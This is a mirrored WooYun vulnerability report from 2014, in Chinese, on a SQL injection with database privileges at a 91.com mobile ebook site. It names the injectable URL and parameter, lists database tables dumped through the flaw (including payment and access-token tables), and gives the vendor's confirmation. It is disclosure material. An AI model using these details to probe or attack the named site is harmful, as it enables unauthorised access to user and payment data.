乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-02-10: 细节已通知厂商并且等待厂商处理中 2014-02-11: 厂商已经确认,细节仅向厂商公开 2014-02-21: 细节向核心白帽子及相关领域专家公开 2014-03-03: 细节向普通白帽子公开 2014-03-13: 细节向实习白帽子公开 2014-03-27: 细节向公众公开
91某站DB权限SQL注入涉及多库
注入url:http://wap.ks.91.com/SimpleEbook/SubjectList.aspx?id=110
列出的库名(时间太长没列完):
Novel_ChapterPandaCoinPayHistoryNovel_Book_2013BACKsysarticleupdatesError_PandaCoinOrderD99_TmpT_PandaLimitMSpub_identity_rangesystranschemasPandaCoinPayHistory_201306T_LimitValuePandaUserCoinMSpeer_lsnsPandaCoinPayHistory_201208MSpeer_requestCartoonExtendNovel_LatestReadInfoT_BookToFriendsRecommendMSpeer_responseDel_InvestigatePandaCoinPayHistory_201307T_MyAttention_BackT_PandaUserActionT_BookRecommendPandaCoinPayHistory_20130101T_BookEvaluationsysreplserversPandaBulkShopProductT_PandaUnityStatDel_PandaChapterCoinChangeCosimple_PandaNewBookStatisT_PandaActionUnityStat_NewT_BookRelatedPandaCoinPayHistory_201309PandaUserGiftCoin_201301Error_BookChapterNOVERL1125SinaAccessTokenCosimple_PayRecordChartNovel_LeyinBookNovel_ChapterBlacklistPandaRewardCommentPandaUserGiftCoin_201302Novel_LeyinBookPreviewPandaCoinPayHistory_201209PandaCoinOrder_Release_Factory_201308PandaCoinOrder_Release_Factory_201401Novel_LeyinUerInfoPandaUserGiftCoin_201303PandaCoinOrder_Release_Factory_201308_BPandaCoinOrder_Release_Factory_201401_BPandaLeyinOrderPandaCoinPayHistory_201310PandaCoinOrder_Release_Factory_201308_CPandaUserGiftCoin_201304Novel_BookPandaCoinOrder_Release_Factory_201401_C
危害等级:高
漏洞Rank:15
确认时间:2014-02-11 09:17
感谢 委员长 提交的漏洞,安排处理
暂无